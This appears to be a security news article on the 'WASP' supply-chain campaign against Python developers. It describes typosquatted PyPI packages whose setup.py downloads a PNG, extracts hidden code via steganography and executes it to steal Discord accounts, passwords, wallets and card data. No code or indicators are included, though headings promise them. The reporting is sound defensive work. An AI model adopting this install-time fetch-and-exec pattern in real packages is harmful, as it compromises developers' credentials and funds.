Researchers from Checkpoint and Phylum had identified a new supply chain attack targetting to compromise python developers by making them download typosquatted python modules which contains malicious code in the intention of compromising the same.
Researchers from Checkmarx has tracked these hacker with the help of two reports combined from Checkpoint and Phylum with threat actor as “WASP”.
During the investigation and tracking attempt the threat actor seems to be employing Steganography and polymorphism techniques to stay under the radar. Apart from that, the threat actor was maintain multiple fake profile in github with multiple fake followers to prove that its a legitimate packages.
WASP stealer is a malicious program which is specialised on stealing discord accounts, passwords, crypto wallets, credit card details and other interesting files and exfiltrate it to the attacker controlled servers.
Additionally researchers identified that the WASP hacker was selling his toolkit for 20$ which can be accepted as a crypto or a gift card.
“The malicious package researchers detected was named ‘apicolor’. At first glance, it seemed like one of the many in development packages on PyPI. ” reads the report.
Next, the setup.py script downloads a .png image from this address and saves it in the operating system’s temp directory.
The setup.py script downloads a .png image from this address and saves it in the operating system’s temp directory.
Then, the setup.py script uses the “lsb.reveal” function, which is located in the freshly installed judyb package, to extract a hidden code from the image downloaded.
“After taking a deeper look into the package installation script, researchers noticed a strange, non-trivial, code section at the beginning. It starts by manually installing extra requirements (not through the more common requirements section), then it downloads a picture from the web and uses the newly installed package to process the picture and trigger the processing generated output using the exec command.” Below is the sample code snippet.
The researchers also revealed that they had identified the threat actor profile via discord server and revealed here.
“Threat actors have progressed from the ‘mimic a common package and slightly hide your malicious code’ technique. They are creating organized campaigns that directly target certain types of users. Moving the infection phase from the highly watched PyPI platform to a more crowded domain, such as GitHub, makes detecting malicious packages more difficult” Concludes the report.
Indicators of compromise: